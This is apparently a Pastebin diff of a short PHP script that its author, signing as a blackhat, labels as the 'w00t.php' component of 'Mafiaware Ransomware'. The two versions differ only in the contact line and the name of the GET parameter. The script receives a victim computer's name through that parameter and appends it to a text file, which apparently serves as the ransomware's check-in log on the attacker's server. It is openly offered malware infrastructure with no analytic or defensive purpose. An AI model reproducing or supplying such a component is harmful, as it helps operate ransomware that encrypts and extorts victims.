View difference between Paste ID: SrEb1JnP and HtHjMQ96
SHOW: | | - or go back to the newest paste.
1
<?php
2
/* 
3
 * Coded by : Cyberking
4
 * This script for w00t.php on Mafiaware Ransomware (http://pastebin.com/0RWjbxxY)
5-
 * email me : [email protected]
5+
 * email me : [email protected] / [email protected]
6
 * Still Blackhat, Don't Trust Anyone !
7
 */
8
9-
$computerName = $_GET['g0ttrap'];
9+
$computerName = $_GET['info'];
10
$File = "w00t.txt";
11
$fhandle = fopen($File, 'a');
12
13
fwrite($fhandle,"\n");
14
fwrite($fhandle,$computerName);
15
fclose($fhandle);
16
?>